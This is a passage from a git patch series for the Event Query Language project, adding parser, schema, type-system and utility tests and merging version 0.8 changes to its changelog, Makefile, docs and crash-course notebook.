"this\nis\nalso\na\nmultiline\ncomment" + ] + + for source in sources: + self.assertTrue(Match.run(source, ".*comment")) + # \n newlines must match on \n \s etc. but won't match on " " + self.assertTrue(Match.run(source, ".*this\sis\s.*comment")) + self.assertTrue(Match.run(source, "t.+a.+c.+")) + self.assertFalse(Match.run(source, "MiSsInG")) + + for source in sources: + self.assertTrue(Wildcard.run(source, "*comment")) + self.assertTrue(Wildcard.run(source, "this*is*comment")) + self.assertTrue(Wildcard.run(source, "t*a*c*")) + self.assertFalse(Wildcard.run(source, "MiSsInG")) + + def test_pipes_reset_state(self): + """Test that the pipes are clearing their state after receiving PIPE_EOF""" + events = self.get_events() + + queries = [ + 'process where true | unique opcode', + 'process where true | unique_count opcode', + 'process where true | unique_count', + 'process where true | count', + 'process where true | count opcode', + 'process where true | head 1', + 'process where true | tail', + 'process where true | sort opcode', + 'process where true | window 10s', + 'process where true | window 5m | head 1', + ] + + for query in queries: + engine = PythonEngine() + + results = [] # type: list[Event] + engine.add_output_hook(results.append) + engine.add_queries([parse_query(query)]) + + engine.stream_events(events) + engine.finalize() + expected_len = len(results) + + results.clear() + + engine.stream_events(events) + engine.finalize() + actual_len = len(results) + + self.assertEquals( + expected_len, + actual_len, + f"Expected results to be same when streaming events multiple times {query}" + ) + diff --git a/tests/test_queries.json b/tests/test_queries.json deleted file mode 100644 index fe51488..0000000 --- a/tests/test_queries.json +++ /dev/null @@ -1 +0,0 @@ -[] diff --git a/tests/test_schema.py b/tests/test_schema.py new file mode 100644 index 0000000..2ec6ac6 --- /dev/null +++ b/tests/test_schema.py @@ -0,0 +1,231 @@ +"""Test case.""" +import unittest + +from eql.events import Event +from eql.errors import EqlSchemaError, EqlTypeMismatchError +from eql.parser import parse_query, strict_field_schema, allow_enum_fields +from eql.schema import Schema, MIXED_TYPES as MIXED +from eql.types import BASE_STRING as STR, BASE_NUMBER as NUM, BASE_BOOLEAN as BOOL + + +class TestSchemaValidation(unittest.TestCase): + """Tests for schema lookups and type system.""" + + schema = { + "process": { + "command_line": STR, + "process_name": STR, + "pid": NUM, + "elevated": BOOL + + }, + "file": { + "file_path": STR, + "file_name": STR, + "process_name": NUM, + "pid": NUM, + "data": MIXED, + }, + "complex": { + "string_arr": [STR], + "wideopen": {}, + "nested": { + "arr": [MIXED], + "double_nested": { + "nn": NUM, "triplenest": {"m": MIXED, "b": BOOL} + }, + "num": NUM + }, + "objarray": [{}], + } + } + + def test_valid_schema_event(self): + """Test that schema errors are being raised separately.""" + valid = [ + 'process where true', + 'file where true', + 'complex where true', + 'any where true', + 'generic where true' + ] + + with Schema(self.schema, allow_generic=True, allow_any=True): + for query in valid: + parse_query(query) + + def test_invalid_schema_event(self): + """Test that schema errors are being raised separately.""" + invalid = [ + 'PROCESS where true', + 'network where true', + 'person where true', + 'generic where true', + 'any where true' + ] + + with Schema(self.schema, allow_generic=False, allow_any=False): + for query in invalid: + self.assertRaises(EqlSchemaError, parse_query, query) + + def test_valid_schema_fields(self): + """Test that schema errors are being raised separately.""" + valid = [ + 'process where process_name == "test" and command_line == "test" and not pid', + 'file where file_path == "abc" and data == 1', + 'file where file_path == "abc" and data == "fdata.exe"', + 'file where file_path == "abc" and not data', + 'file where file_path == "abc" and length(data) | filter file_path == "abc"', + 'sequence [file where pid=1] [process where pid=2] | filter events[0].file_name = events[1].process_name', + 'sequence by pid [file where 1] [process where 1] | filter events[0].file_name = events[1].process_name', + 'join by pid [file where 1] [process where 1] | filter events[0].file_name = events[1].process_name', + + 'join [file where 1] by pid [process where 1] by pid until [complex where 0] by nested.num' + '| filter events[0].file_name = events[1].process_name', + + 'complex where string_arr[3]', + 'complex where wideopen.a.b[0].def == 1', + 'complex where nested.arr', + 'complex where nested.arr[0] == 1', + 'complex where nested.double_nested.nn == 5', + 'complex where nested.double_nested.triplenest', + 'complex where nested.double_nested.triplenest.m == 5', + 'complex where nested. double_nested.triplenest.b', + ] + + with Schema(self.schema): + for query in valid: + parse_query(query) + + def test_schema_enum_enabled(self): + """Test that enum fields are converted to string comparisons.""" + with Schema(self.schema), allow_enum_fields: + actual = parse_query("process where process_name.bash") + expected = parse_query("process where process_name == 'bash'") + self.assertEquals(actual, expected) + + def test_schema_enum_disabled(self): + """Test that enum errors are raised when not explicitly enabled.""" + with Schema(self.schema): + self.assertRaises(EqlSchemaError, parse_query, "process where process_name.bash") + + def test_invalid_schema_fields(self): + """Test that schema errors are being raised separately.""" + invalid = [ + 'process where not bad_field', + 'process where file_path', + 'file where command_line', + 'process where wideopen.a.b.c', + 'any where invalid_field', + 'complex where nested. double_nested.b', + 'file where file_path == "abc" and length(data) | unique missing_field == "abc"', + 'sequence [file where pid=1] [process where pid=2] | filter events[0].file_name = events[1].bad', + + 'sequence [file where 1] by pid [process where 1] by pid until [complex where 0] by pid' + '| unique events[0].file_name = events[1].process_name', + ] + with Schema(self.schema): + for query in invalid: + with self.assertRaises(EqlSchemaError): + parse_query(query) + + def test_array_functions(self): + """Test that array functions match array fields.""" + valid = [ + "complex where arrayContains(string_arr, 'thesearchstring')", + "complex where arrayContains(string_arr, 'thesearchstring', 'anothersearchstring')", + # this should pass until generics/templates are handled better + "complex where arrayContains(string_arr, 1)", + "complex where arrayContains(string_arr, 1, 2, 3)", + "complex where arraySearch(string_arr, x, x == '*subs*')", + "complex where arraySearch(objarray, x, x.key == 'k')", + "complex where arraySearch(objarray, x, arraySearch(x, y, y.key == true))", + "complex where arraySearch(nested.arr, x, x == '*subs*')", + "complex where arrayContains(objarray, 1)", + "complex where arrayContains(objarray, 1, 2, 3)", + ] + with Schema(self.schema): + for query in valid: + parse_query(query) + + def test_array_function_failures(self): + """Test that array functions fail on nested objects or the wrong type.""" + valid = [ + "process where arrayContains(pid, 4)", + "process where arraySearch(pid, x, true)", + "complex where arraySearch(objarray, '*subs*')", + ] + with Schema(self.schema): + for query in valid: + self.assertRaises(EqlTypeMismatchError, parse_query, query) + + def test_strict_schema(self): + """Check that fields can't be compared to null under strict schemas.""" + queries = [ + "process where command_line != null", + "process where elevated != null", + # explicit boolean checking + "process where process_name and command_line", + "process where 1 and 2", + "process where command_line", + ] + + with strict_field_schema, Schema(self.schema): + for query in queries: + self.assertRaises(EqlTypeMismatchError, parse_query, query) + + def test_count_schemas(self): + """Test that schemas are updated with counts in pipes.""" + queries = [ + "process where true | count | filter key == 'total' and percent < 0.5 and count > 0", + "process where true | unique_count process_name | filter count > 5 and process_name == '*.exe'", + "sequence[file where 1][process where 1] | unique_count events[0].process_name" + + " | filter count > 5 and events[1].elevated", + ] + + with Schema(self.schema): + for query in queries: + parse_query(query) + + def test_count_schema_failures(self): + """Test that schemas aren't overly updated with counts in pipes.""" + queries = [ + "process where true | count | filter key == 'total' and percent < 0.5 and count > 0 and elevated", + "process where true | unique_count process_name | filter key == '*.abc'" + + " and count > 5 and process_name == '*.exe'", + "sequence[file where 1][process where 1] | unique_count events[0].process_name" + + " | filter count > 5 and events[0].elevated", + ] + + with Schema(self.schema): + for query in queries: + print(query) + self.assertRaises(EqlSchemaError, parse_query, query) + + def test_merge_schema(self): + """Merge two schemas together.""" + a = Schema({"process": {"a": "string", "b": "number", "c": {}}}) + b = Schema({"process": {"c": "mixed"}, "file": {"path": "string"}}) + + # Test that schemas prefer keys from the first + c = a.merge(b) + self.assertDictEqual(c.schema, {"process": {"a": "string", "b": "number", "c": {}}, "file": {"path": "string"}}) + + def test_learn_schema(self): + """Test that schemas can be learned from a set of data.""" + data = [ + {"event_type": "process", "a": {"b": 1, "c": 2}, "d": "e"}, + {"event_type": "file", "a": "b", "cd": ["ef", 123]}, + {"event_type": "process", "a": {"b": 1, "c": "e"}}, + ] + event_schema = { + "process": {"a": {"b": "number", "c": "mixed"}, "d": "string", "event_type": "string"}, + "file": {"a": "string", "cd": ["number", "string"], "event_type": "string"}, + } + schema = Schema.learn(Event.from_data(d) for d in data) + self.assertDictEqual(schema.schema, event_schema) + self.assertFalse(schema.allow_generic) + + schema = Schema.learn([Event("generic", 0, {"a": "b"})]) + self.assertDictEqual(schema.schema, {"generic": {"a": "string"}}) + self.assertTrue(schema.allow_generic) diff --git a/tests/test_type_system.py b/tests/test_type_system.py new file mode 100644 index 0000000..2dd3cd3 --- /dev/null +++ b/tests/test_type_system.py @@ -0,0 +1,117 @@ +"""Test case.""" +import unittest + +from eql.errors import EqlTypeMismatchError +from eql.parser import parse_expression +from eql.types import * # noqa + + +class TestTypeSystem(unittest.TestCase): + """Test that the type system correctly validates types.""" + + def test_specifier_checks(self): + """Test that specifiers are properly compared.""" + expected = [ + # Full truth table + (DYNAMIC_SPECIFIER, NO_SPECIFIER, False), + (DYNAMIC_SPECIFIER, LITERAL_SPECIFIER, False), + (DYNAMIC_SPECIFIER, DYNAMIC_SPECIFIER, True), + + (LITERAL_SPECIFIER, NO_SPECIFIER, False), + (LITERAL_SPECIFIER, LITERAL_SPECIFIER, True), + (LITERAL_SPECIFIER, DYNAMIC_SPECIFIER, False), + + (NO_SPECIFIER, DYNAMIC_SPECIFIER, True), + (NO_SPECIFIER, LITERAL_SPECIFIER, True), + ] + + for spec1, spec2, rv in expected: + self.assertEqual(check_specifiers(spec1, spec2), rv, "specifier {} x {} != {}".format(spec1, spec2, rv)) + + def test_type_checks(self): + """Test that types are properly compared.""" + tests = [ + (BASE_STRING, BASE_STRING, True), + (BASE_STRING, BASE_BOOLEAN, False), + (BASE_NUMBER, BASE_STRING, False), + + # anything could potentially be null + (BASE_NULL, BASE_NUMBER, False), + (BASE_STRING, BASE_NULL, False), + (BASE_NULL, BASE_NULL, True), + + # test out unions + (BASE_STRING, (BASE_NUMBER, BASE_NULL), False), + ((BASE_STRING, (BASE_NUMBER, (BASE_STRING, BASE_BOOLEAN))), BASE_NULL, False), + ((BASE_STRING, (BASE_NUMBER, (BASE_STRING, BASE_BOOLEAN))), BASE_BOOLEAN, True), + (BASE_ALL, BASE_STRING, True), + (BASE_STRING, BASE_STRING, True), + (BASE_PRIMITIVES, BASE_STRING, True), + ((BASE_NUMBER, BASE_STRING), BASE_BOOLEAN, False), + ((BASE_NUMBER, (BASE_PRIMITIVES, ), BASE_BOOLEAN), BASE_BOOLEAN, True) + ] + + for hint1, hint2, expected in tests: + output = check_types(hint1, hint2) + self.assertEqual(output, expected, "hint {} x {} != {}".format(hint1, hint2, expected)) + + def test_parse_type_matches(self): + """Check that improperly compared types are raising errors.""" + expected_type_match = [ + '1 or 2', + 'abc == null or def == null', + "false or 1", + "1 or 'abcdefg'", + "false or 'string-false'", + "port == 80 or command_line == 'defghi'", + "(port != null or command_line != null)", + "(process_path or process_name) == '*net.exe'", + "'hello' < 'hELLO'", + "1 < 2", + "(data and data.alert_details and data.alert_details.process_path) == 'net.exe'", + ] + + for expression in expected_type_match: + parse_expression(expression) + + def test_parse_type_mismatches(self): + """Check that improperly compared types are raising errors.""" + expected_type_mismatch = [ + '1 == "*"', + 'false = 1', + '100 = "a"', + '100 != "*abcdef*"', + '100 in ("string1", "string2")', + 'true != 100', + '100 != "abc"', + '"some string" == null', + 'true < false', + 'true > "abc"', + 'field < true', + 'true <= 6', + "'hello' > 500", + # no longer invalid + # "concat(1, 2, null)", + + # check for return types + 'true == length(abc)', + '"true" == length(abc)', + + # check for mixed sets + "'rundll' in (1, 2, 3, abc.def[100], 'RUNDLL', false)", + "not 'rundll' in (1, 2, 3, '100', 'nothing', false)", + ] + + for expression in expected_type_mismatch: + self.assertRaises(EqlTypeMismatchError, parse_expression, expression) + + def test_invalid_function_signature(self): + """Check that function signatures are correct.""" + expected_type_mismatch = [ + "length(0)", + "wildcard(abc, def)", + "length(f) > 'def'", + ] + + for expression in expected_type_mismatch: + self.assertRaises(EqlTypeMismatchError, parse_expression, expression) diff --git a/tests/test_utils.py b/tests/test_utils.py index 409f653..556dcc7 100644 --- a/tests/test_utils.py +++ b/tests/test_utils.py @@ -4,6 +4,8 @@ import unittest import eql.utils +from eql.parser import parse_query, parse_expression, EqlParseError +from eql.utils import is_stateful, match_kv class TestUtils(unittest.TestCase): @@ -41,3 +43,102 @@ def test_stream_jsonl(self): jsonl = '\n'.join(json.dumps(item) for item in example) parsed = list(eql.utils.stream_json_lines(jsonl.splitlines())) self.assertEqual(parsed, example, "JSON lines didn't stream properly.") + + def test_stateful_checks(self): + """Check that :func:`~utils.is_stateful` is identifying stateful queries.""" + stateful_queries = [ + "sequence [process where process_name='net.exe'] [process where process_name='net.exe']", + "join [process where process_name='net.exe'] [process where process_name='net.exe']", + "file where file_name='*.txt' and descendant of [process where pid=4]", + "file where child of [process where pid=4]", + "registry where event of [process where pid=4]", + "process where true | unique_count process_name | filter count < 5", + "any where true | count user_name", + ] + + for query in stateful_queries: + ast = parse_query(query) + self.assertTrue(is_stateful(ast), "{} was not recognized as stateful".format(query)) + + def test_stateless_checks(self): + """Check that :func:`~utils.is_stateful` is identifying stateless queries.""" + stateless_queries = [ + "process where true | filter command_line='* https://*' | tail 10", + "process where user_name='system' | unique parent_process_name | head 500", + "file where file_name='*.txt' and (process_name='cmd.exe' or parent_process_name='net.exe')", + "registry where length(user_name) == 500", + "network where string(destination_port) == '500' | unique process_name", + ] + + for query in stateless_queries: + ast = parse_query(query) + self.assertFalse(is_stateful(ast), "{} was not recognized as stateless".format(query)) + + def test_match_kv(self): + """Check that :func:~utils.match_kv~ returns the expected EQL expressions.""" + def assert_kv_match(condition_dict, condition_text, *args): + """Helper function for validation.""" + condition_node = match_kv(condition_dict) + parsed_node = parse_expression(condition_text) + print(condition_node) + print(parsed_node) + self.assertEquals(condition_node.render(), parsed_node.render(), *args) + + assert_kv_match({"name": "net.exe"}, + r"name == 'net.exe'", + "Simple KV match") + + assert_kv_match({"name": ["net.exe"]}, + r"name == 'net.exe'", + "Single list match") + + assert_kv_match({"path": ["C:\\windows\\system32\\net.exe"]}, + r"path == 'C:\\windows\\system32\\net.exe'", + "String escaping") + + assert_kv_match({"path": ["C:\\windows\\system32\\net*.exe", "C:\\windows\\*\\cmd.exe"]}, + r"wildcard(path, 'C:\\windows\\system32\\net*.exe', 'C:\\windows\\*\\cmd.exe')", + "Multiple wildcards") + + assert_kv_match({"nested[0].name.test": ["net.exe"]}, + r"nested[0].name.test == 'net.exe'", + "Nested field check") + + assert_kv_match({"name": ["net.exe", "net1.exe"]}, + r"name in ('net.exe', 'net1.exe')", + "Multiple values in list") + + assert_kv_match({"name": ["net.exe", "net1.exe"], "pid": 4}, + r"name in ('net.exe', 'net1.exe') and pid == 4", + "Multiple fields checked") + + assert_kv_match({"completed": True, "delta": [8.2, 8.4]}, + r"completed == true and delta in (8.2, 8.4)", + "Booleans and floats") + + assert_kv_match({"name": ["net.exe", "net1.exe", "cmd*.exe"], "pid": [4]}, + r"(name in ('net.exe', 'net1.exe') or name == 'cmd*.exe') and pid == 4", + "Complex query") + + # Test for nested fields + assert_kv_match({"events[0].process_path": "c:\\windows\\explorer.exe", + "events[1].file_name": "test.docx"}, + r"events[0].process_path == 'c:\\windows\\explorer.exe' and events[1].file_name == 'test.docx'", + "Nested fields") + + assert_kv_match({"triggering_fact_array[0].data_buffer.process_path": "c:\\windows\\explorer.exe"}, + r"triggering_fact_array[0].data_buffer.process_path == 'c:\\windows\\explorer.exe'") + + assert_kv_match({}, "true", "Empty dict") + assert_kv_match({"empty": []}, "false", "Empty list of values") + + def test_match_kv_errors(self): + """Test that KV matching raises errors when expected.""" + self.assertRaises(EqlParseError, match_kv, {"invalid^field&syntax": "abc"}) + self.assertRaises(TypeError, match_kv, {"100": "invalid field"}) + + # Test that the parameters are validated + self.assertRaises(TypeError, match_kv, {"process_name": ["a", tuple()]}) + self.assertRaises(TypeError, match_kv, []) + self.assertRaises(TypeError, match_kv, True) + self.assertRaises(TypeError, match_kv, 1) From 845a8726c6f22aa6c77409089340dc706cecdb7d Mon Sep 17 00:00:00 2001 From: itsnotapt <3096198+itsnotapt@users.noreply.github.com> Date: Sat, 19 Oct 2019 00:12:28 +0100 Subject: [PATCH 09/13] Fixed doco to use wildcard function --- docs/query-guide/pipes.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index c664a7c..42241cb 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst @@ -141,7 +141,7 @@ Find suspicious recon commands that were executed within a 5 minute window Find processes that have network connections to a single host with over 100 unique ports within a 10 second window .. code-block:: eql - network where destination_address in ("10.*", "172.*", "192.*") + network where wildcard(destination_address, "10.*", "172.*", "192.*") | window 10s | unique_count process_name, destination_port | filter count >= 100 From 110bbbd358a8c510295c9a3a8c35a1b8d348d5b0 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Sun, 20 Oct 2019 23:04:20 +0100 Subject: [PATCH 10/13] Removed extra time_unit in pipe_argument --- eql/etc/eql.ebnf | 1 - 1 file changed, 1 deletion(-) diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf index 40734a2..c3186d1 100644 --- a/eql/etc/eql.ebnf +++ b/eql/etc/eql.ebnf @@ -26,7 +26,6 @@ pipe_command::Pipe pipe_arguments = - | @+:time_unit | &(atom atom) {atom} | expressions | {} From f62ff952c75b21bf09858f9b1e81632fcb080ca7 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Tue, 4 Feb 2020 14:19:42 +0000 Subject: [PATCH 11/13] Merge changes from EQL 8.0. --- .github/PULL_REQUEST_TEMPLATE.md | 1 - CHANGELOG.md | 33 +- Makefile | 26 +- README.md | 3 +- docs/_static/eql-crash-course.ipynb | 325 ++++------ docs/index.rst | 2 +- docs/links.rst | 4 +- docs/query-guide/basic-syntax.rst | 17 +- docs/query-guide/functions.rst | 158 ++++- docs/query-guide/grammar.rst | 6 +- docs/query-guide/implementation.rst | 2 +- docs/query-guide/pipes.rst | 10 +- docs/query-guide/sequences.rst | 3 +- docs/resources.rst | 15 +- eql/__init__.py | 6 +- eql/ast.py | 113 +++- eql/build.py | 12 +- eql/engine.py | 17 +- eql/etc/test_data.json | 2 +- eql/etc/test_queries.toml | 529 ++++++++++------ eql/functions.py | 259 +++++++- eql/highlighters.py | 2 +- eql/parser.py | 936 +++++++++++++++++----------- eql/pipes.py | 12 +- eql/shell.py | 26 +- eql/tests/base.py | 13 +- eql/utils.py | 24 +- eql/walkers.py | 10 +- requirements.txt | 2 +- setup.py | 2 +- tests/test_optimizations.py | 10 + tests/test_parser.py | 74 ++- tests/test_python_engine.py | 27 +- tests/test_schema.py | 14 +- tests/test_utils.py | 66 +- 35 files changed, 1864 insertions(+), 897 deletions(-) diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md index e898b96..268ee7d 100644 --- a/.github/PULL_REQUEST_TEMPLATE.md +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -1,5 +1,4 @@ - ## Issues ## Details diff --git a/CHANGELOG.md b/CHANGELOG.md index a5a1acc..6c6fc94 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,6 +1,37 @@ # Event Query Language - Changelog The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/). + +## Version 0.8.2 +_Released 2020-01-13_ + +### Fixed +* Restored missing text from semantic error messages + +## Version 0.8.1 +_Released 2020-01-09_ + +### Fixed +* Correctly load definitions/schema with `eql.build.get_engine` + +## Version 0.8 +_Released 2019-11-01_ + +### Added +* Method syntax +* Mathematical operators `+`, `-`, `*`, `/`, `%` +* Documentation for `match()` function +* `between()` function for extracting the first substring between two strings +* `cidrMatch()` function and several helper methods for subnet matching and regex building +* `extract_query_terms` to extract the original text for each event in a query + +### Changed +* Parser from TatSu to Lark + +### Fixed +* Examples for sequences in the Implementation Details page +* Compatibility for `eql shell` with Python 2.7 + ## Version 0.7 _Released 2019-07-24_ @@ -53,7 +84,7 @@ _Released 2018-12-13_ ## Version 0.6.1 _Released 2019-12-05_ -## Added +### Added * Support for gzipped files ## Version 0.6 diff --git a/Makefile b/Makefile index 2a7c415..c34746c 100644 --- a/Makefile +++ b/Makefile @@ -7,9 +7,6 @@ VENV_BIN := $(VENV)/bin PYTHON := $(VENV_BIN)/python PIP := $(PYTHON) -m pip SPHINXBUILD ?= $(VENV_BIN)/sphinx-build -VERSION ?= - -PARSER_FILE := eql/_parsergen.py $(VENV): @@ -19,16 +16,9 @@ $(VENV): $(PIP) install setuptools -U -$(PARSER_FILE): $(VENV) - $(PYTHON) -m tatsu eql/etc/eql.ebnf -o $(PARSER_FILE) - -.PHONY: parser -parser: $(PARSER_FILE) - - .PHONY: clean clean: - rm -rf $(VENV) *.egg-info .eggs *.egg htmlcov build dist .build .tmp .tox *.egg-info .coverage coverage.xml junit.xml .pytest_cache $(PARSER_FILE) + rm -rf $(VENV) *.egg-info .eggs *.egg htmlcov build dist .build .tmp .tox *.egg-info .coverage coverage.xml junit.xml .pytest_cache find . -type f -name '*.pyc' -delete find . -type f -name '__pycache__' -delete @@ -37,12 +27,12 @@ testdeps: $(PIP) install -r requirements_test.txt .PHONY: pytest -pytest: $(VENV) parser testdeps +pytest: $(VENV) testdeps $(PYTHON) setup.py -q test .PHONY: pylint -pylint: $(VENV) parser testdeps +pylint: $(VENV) testdeps $(PYTHON) setup.py -q lint @@ -51,22 +41,22 @@ test: $(VENV) pylint pytest .PHONY: sdist -sdist: $(VENV) parser +sdist: $(VENV) $(PYTHON) setup.py sdist .PHONY: bdist_egg -bdist_egg: $(VENV) parser +bdist_egg: $(VENV) $(PYTHON) setup.py bdist_egg .PHONY: bdist_wheel -bdist_wheel: $(VENV) parser +bdist_wheel: $(VENV) $(PYTHON) setup.py bdist_wheel .PHONY: install -install: $(VENV) parser +install: $(VENV) $(PYTHON) setup.py install .PHONY: all @@ -81,4 +71,4 @@ docs: $(VENV) install .PHONY: upload upload: $(VENV) $(PIP) install twine~=1.13 - $(VENV_BIN)/twine upload dist/* + $(VENV_BIN)/twine upload dist/* diff --git a/README.md b/README.md index cd0a0f7..fa03472 100644 --- a/README.md +++ b/README.md @@ -2,6 +2,7 @@ [![PyPI](https://img.shields.io/pypi/v/eql.svg)](https://pypi.python.org/pypi/eql) [![Gitter](https://badges.gitter.im/eventquerylang/community.svg)](https://gitter.im/eventquerylang/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) [![Documentation](https://readthedocs.org/projects/eql/badge/?version=latest)](https://eql.readthedocs.io/en/latest/?badge=latest) +[![License: AGPL v3](https://img.shields.io/badge/License-AGPL%20v3-blue.svg)](https://www.gnu.org/licenses/agpl-3.0) [![Twitter Follow](https://img.shields.io/twitter/follow/eventquerylang.svg?style=social)](https://twitter.com/eventquerylang) @@ -20,7 +21,7 @@ If Python is configured and already in the PATH, then ``eql`` will be readily av ```console $ eql --version -eql 0.7.0 +eql 0.8 ``` From there, try a [sample json file](docs/_static/example.json) and test it with EQL. diff --git a/docs/_static/eql-crash-course.ipynb b/docs/_static/eql-crash-course.ipynb index 8988d39..72e1418 100755 --- a/docs/_static/eql-crash-course.ipynb +++ b/docs/_static/eql-crash-course.ipynb @@ -10,7 +10,7 @@ "source": [ "# Event Query Language\n", "\n", - "Atomic Friday with Endgame 1/11/2018\n", + "Atomic Friday with Endgame 2019/01/11 (updated 2020/01/09)\n", "\n", "[@eventquerylang](https://twitter.com/eventquerylang)\n", "\n", @@ -28,17 +28,28 @@ "## Getting Started\n", "https://eql.readthedocs.io/en/latest/index.html#getting-started\n", "\n", - "Requires Python (confirmed with 2.7 and 3.5+)\n", + "Requires Python 3\n", "\n", "```console\n", - "$ pip install eql\n", - "\n", "Collecting eql\n", - " Using cached https://files.pythonhosted.org/packages/16/97/2a9bd7f3f2db2cc7889b01046d7d98568f46ad76721f96ff9b5ca7ef084f/eql-0.6.2-py2.py3-none-any.whl\n", - "Requirement already satisfied: PyYAML~=3.13 in c:\\programdata\\anaconda2\\lib\\site-packages (from eql) (3.13)\n", - "Requirement already satisfied: TatSu~=4.2.6 in c:\\programdata\\anaconda2\\lib\\site-packages (from eql) (4.2.6)\n", - "Installing collected packages: eql\n", - "Successfully installed eql-0.6.2\n", + " Downloading https://files.pythonhosted.org/packages/7d/a4/ac5560153f2ee4ed967250198c9cc39e6d6ad938db0ff8600dcb4716598e/eql-0.8.1-py2.py3-none-any.whl (96kB)\n", + " |████████████████████████████████| 102kB 457kB/s\n", + "Collecting lark-parser~=0.7 (from eql)\n", + " Downloading https://files.pythonhosted.org/packages/34/b8/aa7d6cf2d5efdd2fcd85cf39b33584fe12a0f7086ed451176ceb7fb510eb/lark-parser-0.7.8.tar.gz (276kB)\n", + " |████████████████████████████████| 276kB 669kB/s\n", + "Building wheels for collected packages: lark-parser\n", + " Building wheel for lark-parser (setup.py) ... done\n", + " Created wheel for lark-parser: filename=lark_parser-0.7.8-py2.py3-none-any.whl size=62516 sha256=0d431f442b57b113b6afa1d638a86a5c06f6f0d5b112fb3af117ff335e6c6fb7\n", + " Stored in directory: /private/var/folders/_v/l0j01qy91mbdb7z2yf4jxny40000gq/T/pip-ephem-wheel-cache-hjzs7nda/wheels/01/a2/30/ebae6ffa73cf3aa1c972a24d4c78388afd910f91e43bf554aa\n", + "Successfully built lark-parser\n", + "Installing collected packages: lark-parser, eql\n", + " Found existing installation: lark-parser 0.7.8\n", + " Uninstalling lark-parser-0.7.8:\n", + " Successfully uninstalled lark-parser-0.7.8\n", + " Found existing installation: eql 0.8.0\n", + " Uninstalling eql-0.8.0:\n", + " Successfully uninstalled eql-0.8.0\n", + "Successfully installed eql-0.8.1 lark-parser-0.7.8\n", "```\n", "\n", "Read more [next steps](https://eql.readthedocs.io/en/latest/query-guide/basic-syntax.html) to get running and see the [guide](https://eql.readthedocs.io/en/latest/query-guide/basic-syntax.html) for writing queries" @@ -58,18 +69,15 @@ "```json\n", "{\n", " \"command_line\": \"C:\\\\Windows\\\\Explorer.EXE\",\n", - " \"event_subtype_full\": \"already_running\",\n", - " \"event_type_full\": \"process_event\",\n", + " \"event_type\": \"process\",\n", " \"md5\": \"ac4c51eb24aa95b77f705ab159189e24\",\n", - " \"opcode\": 3,\n", " \"pid\": 2460,\n", " \"ppid\": 3052,\n", " \"process_name\": \"explorer.exe\",\n", " \"process_path\": \"C:\\\\Windows\\\\explorer.exe\",\n", - " \"serial_event_id\": 34,\n", + " \"subtype\": \"create\",\n", " \"timestamp\": 131485997150000000,\n", - " \"unique_pid\": 34,\n", - " \"unique_ppid\": 0,\n", + " \"user\": \"research\\\\researcher\",\n", " \"user_domain\": \"research\",\n", " \"user_name\": \"researcher\"\n", "}\n", @@ -90,7 +98,7 @@ "# but this is one way to hook it up to a jupyter notebook for showing results as tables\n", "\n", "from pandas import DataFrame\n", - "from eql.engines.build import get_engine\n", + "from eql.build import get_engine\n", "from eql.utils import stream_file_events\n", "import numpy\n", "\n", @@ -150,20 +158,17 @@ " \n", " \n", " command_line\n", - " event_subtype_full\n", - " event_type_full\n", + " event_type\n", " md5\n", - " opcode\n", " parent_process_name\n", " parent_process_path\n", " pid\n", " ppid\n", " process_name\n", " process_path\n", - " serial_event_id\n", + " subtype\n", " timestamp\n", - " unique_pid\n", - " unique_ppid\n", + " user\n", " user_domain\n", " user_name\n", " \n", @@ -172,140 +177,119 @@ " \n", " 0\n", " \n", - " already_running\n", - " process_event\n", + " process\n", " \n", - " 3\n", " System Idle Process\n", " \n", " 4\n", " \n", " System\n", " \n", - " 2\n", + " create\n", " 131485996510000000\n", - " 2\n", - " 1\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 1\n", " wininit.exe\n", - " already_running\n", - " process_event\n", + " process\n", " 94355c28c1970635a31b3fe52eb7ceba\n", - " 3\n", " \n", " \n", " 424\n", " 364\n", " wininit.exe\n", " C:\\Windows\\System32\\wininit.exe\n", - " 5\n", + " create\n", " 131485996510000000\n", - " 5\n", - " 0\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 2\n", " winlogon.exe\n", - " already_running\n", - " process_event\n", + " process\n", " 1151b1baa6f350b1db6598e0fea7c457\n", - " 3\n", " \n", " \n", " 472\n", " 416\n", " winlogon.exe\n", " C:\\Windows\\System32\\winlogon.exe\n", - " 7\n", + " create\n", " 131485996510000000\n", - " 7\n", - " 0\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 3\n", " C:\\Windows\\system32\\services.exe\n", - " already_running\n", - " process_event\n", + " process\n", " 24acb7e5be595468e3b9aa488b9b4fcb\n", - " 3\n", " wininit.exe\n", " C:\\Windows\\System32\\wininit.exe\n", " 524\n", " 424\n", " services.exe\n", " C:\\Windows\\System32\\services.exe\n", - " 8\n", + " create\n", " 131485996520000000\n", - " 8\n", - " 5\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 4\n", " C:\\Windows\\system32\\lsass.exe\n", - " already_running\n", - " process_event\n", + " process\n", " 7554a1b82b4a222fd4cc292abd38a558\n", - " 3\n", " wininit.exe\n", " C:\\Windows\\System32\\wininit.exe\n", " 536\n", " 424\n", " lsass.exe\n", " C:\\Windows\\System32\\lsass.exe\n", - " 9\n", + " create\n", " 131485996520000000\n", - " 9\n", - " 5\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 5\n", " C:\\Windows\\Explorer.EXE\n", - " already_running\n", - " process_event\n", + " process\n", " ac4c51eb24aa95b77f705ab159189e24\n", - " 3\n", " \n", " \n", " 2460\n", " 3052\n", " explorer.exe\n", " C:\\Windows\\explorer.exe\n", - " 34\n", + " create\n", " 